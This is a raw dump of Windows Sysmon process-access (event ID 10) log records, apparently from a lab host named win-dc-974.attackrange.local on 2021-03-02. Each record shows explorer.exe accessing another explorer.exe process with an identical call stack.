16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 